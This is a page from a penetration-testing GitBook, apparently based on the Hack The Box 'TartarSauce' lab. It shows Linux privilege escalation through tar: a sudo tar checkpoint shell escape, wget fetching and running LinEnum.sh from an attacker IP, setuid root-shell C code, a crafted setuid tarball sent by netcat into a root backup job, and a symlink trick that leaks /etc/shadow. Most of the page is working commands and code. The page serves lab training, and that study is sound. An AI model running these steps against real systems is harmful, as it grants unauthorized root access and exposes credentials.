Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Easy PrivEsc
  • Backup Script Vulnerability
  • Just like NFS Root Squashing
  • Backup Script Discovery
  • Backup Flaw Scenario
  • Backup Flaw Exploit #1
  • Create the evil setuid
  • TAR the evil suid
  • Backup Flaw Exploit #2
  • REF

Was this helpful?

  1. 06 Linux PrivEsc

TAR backups

Easy PrivEsc

> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar

> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally

Backup Script Vulnerability

  • If root is doing anything as a job, you can attempt to re-direct it

  • Copy the script back to your host and decompose it for analysis

  • Examples of root running TAR:

    • WildcardTarTouchCheckpoint

    • Extracting TAR

Just like NFS Root Squashing

  • Similar to "NFS Root Squashing" and the "jail" box

    • Make setuid root owned

    • gzip the setuid

    • copy back inject into the 'temp' check folder

    • root will extract to 'check' the files

    • and thinks it belongs to him!

  • REF: NFSRootSquash

Backup Script Discovery

  • Enum to find the backup/script/job running

  • Works just fine as 'user'

cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

pspy32             ..get more details
locate backuperer  ..investigate

Backup Flaw Scenario

  1. Backup script runs TAR as Root every 5 minutes

  2. Deletes the previous checks: /var/tmp/.* and /var/tmp/check.

  3. Creates a gzip file of the directory /var/www/html with user-perms

  4. Saves it in the file /var/tmp/.randomsha1

  5. Sleeps for 30 seconds.

  6. Creates the directory /var/tmp/check

  7. Extracts gzip with Root /var/tmp/.randomsha1 to /var/tmp/check

  8. If /var/www/html is different from backup: /var/tmp/check/var/www/html

    1. Report error.

    2. Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak

    3. And delete 'check' directory and .randomsha1

Backup Flaw Exploit #1

  • Script design is to tar as user, then untar as root

  • Then compare previous version (which gives us 5 minutes)

  • We can inject our evil tar:

  • Script will: tar/copy/extract/compare.. and fail with error..

  • Giving us 5 minutes to use root-unzipped-files

Create the evil setuid

----------------------------
gcc        ..installed?
locate -r gcc$

kali:
uname -a   ..we have 32bit (should match target)
cp /opt/shells/setuid.c .

----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main ( int argc, char *argv[] )
{
   setreuid(0,0);
   execve("/bin/sh", NULL, NULL);
}

----------------------------
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

----------------------------
gcc 
apt search gcc-multilib

Compile
gcc -m32 -o setuid setuid.c   ..32 bit compile

TAR the evil suid

  • TAR embeds the userid that owns the file - in the actual archive

  • We create this file and TAR as root .. it will stay root when extracted

----------------------------
kali:

sudo -i                        ..do this work as root
mkdir -p var/www/html          ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid   ..set the suid bit
chmod u+s var/www/html/suid    ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/   ..mock tar

send:
nc -nlvp 9002 < setuid.tar.gz


-----------------------
target:

> cd /var/tmp
> nc $MyIP 9002 > setuid.tzt.gz

> watch -n 1 'systemctl list-timers'
created '.6683a76af11'               ..temp extract
> cp setuid.tar.gz .6683a76af11      ..INJECTED !!!

> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'

> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!

>./ rsuid
whoami root!

Backup Flaw Exploit #2

  • diff runs as root

  • updates to readable error file:

    • /var/backups/onuma_backup_test.txt

  • tar an evil symlink that root will extract/diff

cd /var/tmp/var/www/html
ln -s /etc/shadow index.html      ..symlink
ln -s /root/root.txt index.html   ..alternate
cat index.html                    ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/     ..mock tar

watch -n 1 'systemctl list-timers'
created '.17f6c199'               ..temp extract
> cp symlink.tar.gz .17f6c199     ..swap our evil-tar-sym

job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !

REF

  • tartarHTB

  • https://ranakhalil101.medium.com/hack-the-box-tartarsauce-writeup-w-o-metasploit-e73393d4a0cd

PreviousShell TTY FixNextTransfer Files

Last updated 2 years ago

Was this helpful?